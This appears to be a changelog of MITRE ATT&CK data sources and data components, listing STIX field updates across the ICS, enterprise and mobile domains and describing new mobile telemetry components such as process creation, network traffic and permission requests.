Description: Visual activity on the device that could alert the user to potentially malicious behavior.

ics-attack

Patches

[DS0039] Asset

Current version: 1.0

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-09-26T14:44:35.610Z | 2023-03-24T19:14:15.637Z
x_mitre_collection_layers[0] | host | Host
external_references[0]['url'] | https://attack.mitre.org/data-sources/DS0039 | https://attack.mitre.org/datasources/DS0039
x_mitre_attack_spec_version | 2.1.0 | 3.1.0

[DS0017] Command

Current version: 1.1

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-10-21T15:55:31.986Z | 2023-04-20T18:38:00.625Z
external_references[0]['url'] | https://attack.mitre.org/data-sources/DS0017 | https://attack.mitre.org/datasources/DS0017
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
iterable_item_added
STIX Field | Old value | New Value
x_mitre_platforms |  | Android
x_mitre_platforms |  | iOS
x_mitre_domains |  | mobile-attack

[DS0022] File

Current version: 1.0

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-04-21T14:50:59.123Z | 2022-12-07T19:35:34.863Z
external_references[0]['url'] | https://attack.mitre.org/data-sources/DS0022 | https://attack.mitre.org/datasources/DS0022
x_mitre_attack_spec_version | 2.1.0 | 3.1.0

[DS0028] Logon Session

Current version: 1.1

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-10-21T15:56:16.481Z | 2022-12-07T19:45:09.019Z
external_references[0]['url'] | https://attack.mitre.org/data-sources/DS0028 | https://attack.mitre.org/datasources/DS0028
x_mitre_attack_spec_version | 2.1.0 | 3.1.0

[DS0029] Network Traffic

Current version: 1.1

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-10-20T20:18:34.334Z | 2023-04-20T18:38:13.356Z
external_references[0]['url'] | https://attack.mitre.org/data-sources/DS0029 | https://attack.mitre.org/datasources/DS0029
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
iterable_item_added
STIX Field | Old value | New Value
x_mitre_platforms |  | Android
x_mitre_platforms |  | iOS
x_mitre_domains |  | mobile-attack

[DS0040] Operational Databases

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated |  | False
revoked |  | False
values_changed
STIX Field | Old value | New Value
modified | 2022-05-11T16:22:58.802Z | 2023-03-24T19:14:55.615Z
x_mitre_collection_layers[0] | host | Host
x_mitre_attack_spec_version | 2.1.0 | 3.1.0

[DS0009] Process

Current version: 1.1

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-10-21T15:58:32.516Z | 2023-04-20T18:38:26.515Z
external_references[0]['url'] | https://attack.mitre.org/data-sources/DS0009 | https://attack.mitre.org/datasources/DS0009
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
iterable_item_added
STIX Field | Old value | New Value
x_mitre_platforms |  | Android
x_mitre_platforms |  | iOS
x_mitre_domains |  | mobile-attack

[DS0012] Script

Current version: 1.1

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-10-21T15:58:58.335Z | 2022-12-07T19:50:56.964Z
external_references[0]['url'] | https://attack.mitre.org/data-sources/DS0012 | https://attack.mitre.org/datasources/DS0012
x_mitre_attack_spec_version | 2.1.0 | 3.1.0

[DS0002] User Account

Current version: 1.1

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-10-21T15:59:59.646Z | 2022-12-07T19:50:43.993Z
external_references[0]['url'] | https://attack.mitre.org/data-sources/DS0002 | https://attack.mitre.org/datasources/DS0002
x_mitre_attack_spec_version | 2.1.0 | 3.1.0

Data Components

enterprise-attack

Patches

Process: OS API Execution

Current version: 1.0


Old Description: Initial construction of a WMI object, such as a filter, consumer, subscription, binding, or provider (ex: Sysmon EIDs 19-21)

New Description: Operating system function/method calls executed by a process
Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated |  | False
revoked |  | False
values_changed
STIX Field | Old value | New Value
modified | 2022-03-30T14:26:51.806Z | 2023-04-21T15:41:36.287Z
description | Initial construction of a WMI object, such as a filter, consumer, subscription, binding, or provider (ex: Sysmon EIDs 19-21) | Operating system function/method calls executed by a process
x_mitre_attack_spec_version | 2.1.0 | 3.1.0

mobile-attack

New Data Components

Application Vetting: API Calls

Current version: 1.0

Description: API calls utilized by an application that could indicate malicious activity


Command: Command Execution

Current version: 1.1

Description: The execution of a line of text, potentially with arguments, created from program code (e.g. a cmdlet executed via powershell.exe, interactive commands like >dir, shell executions, etc.)


Sensor Health: Host Status

Current version: 1.1

Description: Logging, messaging, and other artifacts highlighting the health of host sensors (ex: metrics, errors, and/or exceptions from logging applications)


Application Vetting: Network Communication

Current version: 1.0

Description: Network requests made by an application or domains contacted


Network Traffic: Network Connection Creation

Current version: 1.1

Description: Initial construction of a network connection, such as capturing socket information with a source/destination IP and port(s) (ex: Windows EID 5156, Sysmon EID 3, or Zeek conn.log)


Network Traffic: Network Traffic Content

Current version: 1.0

Description: Logged network traffic data showing both protocol header and body values (ex: PCAP)


Network Traffic: Network Traffic Flow

Current version: 1.0

Description: Summarized network packet data, with metrics, such as protocol headers and volume (ex: Netflow or Zeek http.log)


User Interface: Permissions Request

Current version: 1.0

Description: System prompts triggered when an application requests new or additional permissions


Application Vetting: Permissions Requests

Current version: 1.0

Description: Permissions declared in an application's manifest or property list file


Process: Process Creation

Current version: 1.1

Description: The initial construction of an executable managed by the OS, that may involve one or more tasks or threads. (e.g. Win EID 4688, Sysmon EID 1, cmd.exe > net use, etc.)


Process: Process Metadata

Current version: 1.0

Description: Contextual data about a running process, which may include information such as environment variables, image name, user/owner, etc.


Process: Process Termination

Current version: 1.0

Description: Exit of a running process (ex: Sysmon EID 5 or Windows EID 4689)


Application Vetting: Protected Configuration

Current version: 1.0

Description: Device configuration options that are not typically utilized by benign applications


User Interface: System Notifications

Current version: 1.0

Description: Notifications generated by the OS


User Interface: System Settings

Current version: 1.0

Description: Settings visible to the user on the device

ics-attack

Patches

Process: OS API Execution

Current version: 1.0


Old Description: Initial construction of a WMI object, such as a filter, consumer, subscription, binding, or provider (ex: Sysmon EIDs 19-21)

New Description: Operating system function/method calls executed by a process
Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated |  | False
revoked |  | False
values_changed
STIX Field | Old value | New Value
modified | 2022-03-30T14:26:51.806Z | 2023-04-21T15:41:36.287Z
description | Initial construction of a WMI object, such as a filter, consumer, subscription, binding, or provider (ex: Sysmon EIDs 19-21) | Operating system function/method calls executed by a process
x_mitre_attack_spec_version | 2.1.0 | 3.1.0